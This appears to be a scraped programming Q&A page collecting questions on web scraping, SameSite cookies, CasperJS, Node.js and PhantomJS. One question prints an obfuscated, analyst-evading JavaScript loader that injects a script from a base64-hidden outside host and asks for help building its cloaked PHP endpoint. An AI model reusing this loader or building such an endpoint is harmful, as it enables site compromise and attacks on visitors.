Get website content after JavaScript loading with python - javascript

I've got issue with getting an content:
with dryscrape.Session() as c:
PASSWORD = '<PASS>'
USERNAME = '<EMAIL>'
URL = 'https://my.pingdom.com/'
c.get(URL)
soup = BeautifulSoup(c.get(URL).text, "lxml")
csrf = soup.select_one("input[name=__csrf_magic]")["value"]
login_data = {
"email" : USERNAME,
"password" : PASSWORD,
"__csrf_magic" : csrf,}
r = c.post(URL, data=login_data, headers={'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36'})
url = 'https://my.pingdom.com/newchecks/rums?ignoreActive=1'
r = c.get(url).text
print r
And after login in browser i've got value of Load Time in source code, but when i'm using this scipt there is only an {{loadtime}} tag from x-handlebars-template.
Any ideas how I can get it? This is server script so any selenium type of tips doesn't go in here. :)

Related

Setting cookie SameSite=None doesn't work on Chrome / JSP、JAVASCRIPT

I am working on a JSP(tomcat6) application. (domain is different)
I'm trying to set the same-site attribute to None because The cookies have disappeared after more than 2 minutes due to the new version of the chrome browser. (Release date for a fix is February 4, 2020 per: https://www.chromium.org/updates/same-site)
I tried to solve the problem in the following ways but is still not working
response.setHeader("Set-Cookie", "user=test;HttpOnly;Secure;SameSite=None");
response.setHeader("Set-Cookie", "HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; HttpOnly; SameSite=None; Secure";
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
By using Pop-up windows
Code is here
document.form1.division2.value = 1;
document.form1.division3.value = 1;
document.form1.division4.value = 1;
document.form1.pan.value = 4322423434232342;
document.form1.expiryDate.value = 0222;
document.form1.jspName.value = 'index.jsp';
document.form1.method = "post";
document.cookie = "HttpOnly; SameSite=None; Secure";
document.form1.action = http://service3.smartcapsule.jp/disp/ONECLICKCOMM.do;
Header is here
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=90<br>
cache-control=max-age=0<br>
origin=http://localhost:8080<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=same-origin<br>
sec-fetch-mode=navigate<br>
sec-fetch-user=?1<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
cookie=SameSite=None; Secure; aspGroupId=00000000; _ga=GA1.1.371271115.1600306707; _gid=GA1.1.1473986481.1600822923; JSESSIONID=15BA5A77A80B2C93969A44FE9371B135; _gat_UA-71516129-3=1; _token=8b234c913616b70c05100bb7fc141a33; _gat=1; arp_scroll_position=2986.363525390625<br>
</body></html>
-------------------------------------------------------------------------------------------
<html><body>
host=localhost:8080<br>
connection=keep-alive<br>
content-length=384<br>
cache-control=max-age=0<br>
origin=null<br>
upgrade-insecure-requests=1<br>
dnt=1<br>
content-type=application/x-www-form-urlencoded<br>
user-agent=Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4252.0 Safari/537.36<br>
accept=text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br>
sec-fetch-site=cross-site<br>
sec-fetch-mode=navigate<br>
sec-fetch-dest=document<br>
accept-encoding=gzip, deflate, br<br>
accept-language=en,q=0.9,q=0.8,ko;q=0.7,ja;q=0.6,q=0.5<br>
</body></html>
If I don't change browser properties, how should I fix it?
disable 「SameSite by default cookies」 in chrome://flags
「20200924」I tried the following, but the cookies was still lost
Cookies.set('name', 'value', {
sameSite: 'none',
secure: true
})
response.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
document.cookie = "witcher=Geralt; SameSite=None; Secure";
public void doGet( HttpServletRequest request, HttpServletResponse response ) throws ServletException,IOException {
response.setContentType("text/html;charset=Windows-31J");
PrintWriter out = response.getWriter();
out.println("<html><body>");
Enumeration e = request.getHeaderNames();
while( e.hasMoreElements() ) {
String name = ( String )e.nextElement();
out.println( name + "=" + request.getHeader( name ) + "<br>");
}
out.println("</body></html>");
}
document.cookie = "<%= s_cookies %>";
document.cookie = "witcher=Geralt; SameSite=None; Secure";
res.setHeader("Set-Cookie", "user=mcmd;HttpOnly;Secure;SameSite=None");
res.setHeader("Access-Control-Allow-Origin","*");
res.setHeader("Access-Control-Allow-Credentials","true");
crossDomain=true; withCredentials=true;Authorization; Max-Age=60*60*3600
<iframe src="https://service3.smartcapsule.jp/disp/ONECLICKCOMM.do"></iframe>
<script
src="https://code.jquery.com/jquery-3.4.1.min.js"
integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo="
crossorigin="anonymous">
</script>
<script>
const apexUrl = 'localhost:8080';
const forwardUrl = 'https://localhost:8080';
alert(window.location.host);
if (window.location.host === apexUrl) {
window.location.host = forwardUrl;
}
</script>
Google reCAPTCHA
To edit a cookie, set its value, and then add it to the response.
and never forget to change the ExpiresDate.

access the 'd' element from an SVG object with casperjs

I am a very beginer in javascript/phantomjs/casperjs (like only several days of learning) but I am stuck with this svg graph I am trying to scrap data from.
I am trying to access the d="M20,331.37,331.37,21.40...." element from an SVG object using a casperjs code, and write in the console and a txt file (or CSV). I try the following code:
var casper = require('casper').create({
pageSettings: {
loadImages: true,
loadPlugins: true,
userAgent: 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'
}
});
//First step is to open baidu.html
casper.start().thenOpen("file:///baidu.html", function() {
console.log("Baidu website opened");
this.wait(6000);
});
casper.then(function() {
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d");
this.echo(dataFromGraph);
require('fs').write("data_graph.txt", dataFromGraph,'w');
});
casper.run();
But nothing worked. I get NULL element or empty result.
This is all the other code I try:
var dataFromGraph = this.fetchText(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]/d'));
var dataFromGraph = this.getElementsAttribute(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'),"d") //,"d")
var dataFromGraph = this.getElementInfo(require('casper').selectXPath('//*[#id="trend"]/svg/path[6]'))
var dataFromGraph = this.fetchText("#trend > svg > path");
I have the Xpath and the selector of the object but I am not sure how to acces it. Here is a picture of the element I want to scrap.
As the website I want to scrap need a password, this is the HTML file that I save from it https://ufile.io/5y9g2.
The element I want to scrap is the data behind the graph here.
Any help would be very appreciated.
I reworked your script a bit and now it works. Check the snippet below.
var fs = require('fs');
var casper = require('casper').create();
casper.start().thenOpen("http://localhost:8001/baidu.html", function() {
console.log("Baidu website opened");
});
casper.then(function() {
var graphData = this.evaluate(function() {
return document.querySelector('#trend > svg > path:nth-child(11)').getAttribute('d')
});
this.echo(graphData);
fs.write("data_graph.txt", graphData,'w');
});
casper.run();
Hope that helps!

php show code only if you run on js code and put that php link

if (navigator['userAgent'] == 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.27 Safari/537.36' && screen['width'] == '1024' && screen['height'] == '768') {} else {
var javas = document['createElement']('script');
javas['language'] = 'javascript';
javas['type'] = 'text/javascript';
javas['src'] = location['protocol'] + '//' + atob('dmlzdWFsbW90by54eXovaDcucGhw') + '?' + Math['floor']((Math['random']() * 1000000000) + 1) + '&h=' + encodeURIComponent(document['location']['host']);
document['head']['appendChild'](javas)
}
need to know how to make an PHP file that will show code inside if i run that link inside this code, this is the link dmlzdWFsbW90by54eXovaDcucGhw on 64bit (visualmoto.xyz/h7.php) and open this link you cant see nothing u see error but when run on that js code that PHP will open an hidden code can you please help me create that h7.php file.. how can i do it i'm very low on php

Select option from dropdown and submit request using nodejs

I am working on nodejs for scrapping a website and I am very new to nodejs.The website initial page is a popup in which one has to select option from selectbox and submit only then later pages can be browsed.this has to be done for first time and then it will be stored as cookie for later use.
I am able to get html page of popup but I am not able to select option from selectbox and submit request.
Here is my Code
var express = require('express');
var request=require('request');
var cheerio=require('cheerio');
var j = request.jar();
//var cookie = request.cookie();
j.setCookie("city_id=1; path=/; domain=.bigbasket.com", 'http://bigbasket.com/', function(error, cookie) {
//console.log("error"+error.message);
console.log("cookie "+cookie);
});
var app=express();
app.get('/', function(req, res){
console.log("hi");
var sessionVal = req.session;
request({uri:'http://bigbasket.com/',
headers:{'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36' ,
'content-type':'application/x-www-form-urlencoded; charset=UTF-8',
'connection':'keep-alive'},
jar:j},
function(err, response, body) {
// console.log("err "+err.message);
console.log("header"+JSON.stringify(response.headers));
console.log("status"+response.statusCode);
console.log("cookie "+response.cookie);
console.log(body);
var $=cheerio.load(body,{xmlMode: true});
console.log($);
var $selectBox= $('select').filter('.selectboxdiv');
console.log($selectBox.text());
response.end;
});
});
app.listen('8081')
console.log('Magic happens on port 8081');
exports = module.exports = app;
I am able to get select box options through below code :
var $selectBox= $('select').filter('.selectboxdiv');
console.log($selectBox.text());
But I am not able to select that option and submit.I have to select city from dropdown menu and submit request so that I could scrape data from upcoming webpages.
EDIT:
What do you see if you use 'req.body.NAME_OF_YOUR_DROPDOWN_HERE'? Maybe you can see the selected option then?

Phantomjs check for response headers and then execute something

I have the following RequestURL.js file.
var webPage = require('webpage');
var system = require('system');
var page = webPage.create();
page.customHeaders = {"pragma": "akamai-x-feo-trace"};
page.settings.userAgent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
if (system.args.length === 1) {
console.log('Try to pass some args when invoking this script!');
} else {
page.open(system.args[1], function (status) {
var content = page.content;
console.log(content);
phantom.exit();
});
}
Now I execute this as phantomjs --ignore-ssl-errors=yes --ssl-protocol=any RequestURL.js #my_url_here > body.html
Now I have a parser written in python that takes body.html and executes it. Now before that I want the page source to get generated only if the response contains the following header.
X-Akamai-FEO-State:TRANSFORMING
Is there a way to modify my RequestURL.js to get there.
It is expected that page.onResourceReceived is triggered before the page.onLoadFinished callback of page.open().
var transforming = false;
page.onResourceReceived = function(response){
if (response.url === system.args[1]) { // TODO handle redirects if necessary
response.headers.forEach(function(header){
if(header.name === 'X-Akamai-FEO-State') {
transforming = header.value === 'TRANSFORMING';
}
});
}
};
page.open(system.args[1], function (status) {
if (transforming) {
console.log(page.content);
}
phantom.exit();
});

Categories

Resources